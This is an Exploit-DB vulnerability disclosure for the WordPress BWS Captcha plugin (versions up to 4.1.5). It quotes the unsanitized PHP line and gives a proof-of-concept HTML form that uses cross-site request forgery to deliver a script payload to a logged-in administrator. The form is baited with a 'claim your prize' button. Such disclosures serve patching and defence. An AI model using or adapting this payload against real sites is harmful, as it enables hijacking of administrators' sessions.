WordPress Best Web Soft Captcha Plugin <= 4.1.5 - Multiple Vulnerabilities

ID EDB-ID:39547
Type exploitdb
Reporter Colette Chamberland
Modified 2016-03-10T00:00:00


WordPress Best Web Soft Captcha Plugin 4.1.5 - Multiple Vulnerabilities. Webapps exploit for php platform

                                            * Exploit Title: BWS Captcha Multiple Vulnerabilities
* Discovery Date:12.03.2015
* Public Disclosure Date:03.10.2016
* Exploit Author: Colette Chamberland
* Contact: colette@wordfence.com
* Vendor Homepage: http://bestwebsoft.com/
* Software Link: https://wordpress.org/plugins/captcha/
* Version:  <=4.1.5
* Tested on: Wordpress 4.2.x
* Category: Wordpress
* CVE: Requested but none received
Unsanitized input in whitelist.php:

297: $message = __( 'Search results for', $this->textdomain ) . ' : ' . $_REQUEST['s'];

The variable can be passed in using a get as well as a post. An attacker
could send unsuspecting authenticated admin a url crafted like such:


or they can send a form (no CSRF token check)

<form method="post" action="http://victim.com/wp-admin/admin.php?page=captcha.php&action=whitelist">
<input type="hidden" name="s" value="<script>alert(1);</script>">
<input type="submit" name="Search IP" value="Click here to claim your prize!">

and it would execute XSS as long as they were logged in to the site.